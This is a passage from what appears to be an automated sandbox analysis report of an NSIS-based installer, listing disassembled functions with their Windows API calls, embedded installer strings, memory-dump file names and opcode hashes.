                                                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                          • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                          • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                        Strings
                                                                                                                                                                        • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                        • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                        • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                        • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                        • API String ID: 2014279497-3433828417
                                                                                                                                                                        • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                        • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                        • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                        • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                        Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                        • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$Send$ClientScreen
                                                                                                                                                                        • String ID: f
                                                                                                                                                                        • API String ID: 41195575-1993550816
                                                                                                                                                                        • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                        • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                        • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                        • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                        Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                        • MulDiv.KERNEL32(00065600,00000064,046024A0), ref: 00403295
                                                                                                                                                                        • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                        Strings
                                                                                                                                                                        • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                        • String ID: verifying installer: %d%%
                                                                                                                                                                        • API String ID: 1451636040-82062127
                                                                                                                                                                        • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                        • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                        • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                        • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                        Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                        • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                        • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                        • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Char$Next$Prev
                                                                                                                                                                        • String ID: *?|<>/":
                                                                                                                                                                        • API String ID: 589700163-165019052
                                                                                                                                                                        • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                        • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                        • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                        • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                        Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                        • GlobalFree.KERNEL32(008B5F78), ref: 00402387
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeGloballstrcpyn
                                                                                                                                                                        • String ID: CanPoland$Exch: stack < %d elements$Pop: stack empty
                                                                                                                                                                        • API String ID: 1459762280-4121858973
                                                                                                                                                                        • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                        • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                        • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                        • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                                                                                        Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Close$DeleteEnumOpen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1912718029-0
                                                                                                                                                                        • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                        • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                        • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                        • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                        Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                        • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                        • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                        • GlobalFree.KERNEL32(008B5F78), ref: 00402387
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3376005127-0
                                                                                                                                                                        • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                        • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                        • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                        • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                                        Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2568930968-0
                                                                                                                                                                        • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                        • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                        • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                        • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                                                        Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1849352358-0
                                                                                                                                                                        • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                        • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                        • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                        • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                        Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$Timeout
                                                                                                                                                                        • String ID: !
                                                                                                                                                                        • API String ID: 1777923405-2657877971
                                                                                                                                                                        • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                        • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                        • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                        • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                        Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                        • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                        • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                        • String ID: %u.%u%s%s
                                                                                                                                                                        • API String ID: 3540041739-3551169577
                                                                                                                                                                        • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                        • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                        • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
